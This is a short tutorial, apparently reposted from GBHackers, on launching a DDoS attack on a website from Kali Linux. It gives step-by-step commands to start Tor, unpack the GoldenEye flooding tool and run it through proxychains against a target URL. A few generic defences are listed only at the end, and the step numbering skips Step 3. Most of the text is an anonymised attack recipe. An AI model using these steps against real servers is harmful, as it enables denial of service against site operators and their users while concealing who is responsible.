DDOS tools are capable of putting heavy loads on HTTP servers and bring them to their knees by exhausting its resources.
What is DDOS attack?
A type of attack where Multiple compromised systems attacking a single target, which denies access to the service of target system’s legitimate user’s.
In this Kali Linux tutorial, we are to discuss the carried in performing a DDOS attack from Kali Linux.
- EtherApe – A a graphical network monitor, which displays network activity graphically. Hosts and links change in size with traffic. Color coded protocols display.
- Service Tor – Tor allows clients and relays to offer hidden services. That is, you can offer a web server, SSH server, etc., without revealing your IP address to its users.
- Proxychains – Latest version of Proxychains support SOCKS5, SOCKS4, and HTTP CONNECT proxy servers. Proxychains can be mixed up with a different proxy types.
- GoldenEye – GoldenEye a python app designed for Security Testing Purpose only.
How to Perform DDOS Website attack
Step1 : Run etherape [email protected]:~# etherape, it prompts a popup window which displays network activity graphically.
Step2: Run TOR Service now [email protected]:~# service tor start
Step4: Once Downloaded Unzip it as a folder [email protected]:~# unzip GoldenEye-master.zip
Step5: Launch the attack
[email protected]:~/GoldenEye-master# proxychains ./goldeneye.py http://testdomain.com
If you encounter any problems or other compatibility issues, please feel free to comment.
Common Defenses against DDOS attack
- Decrease Per IP connection rate.
- Use IDS, Web-application firewalls.
- Tweak Connection per IP threshold.
Source : GBHackers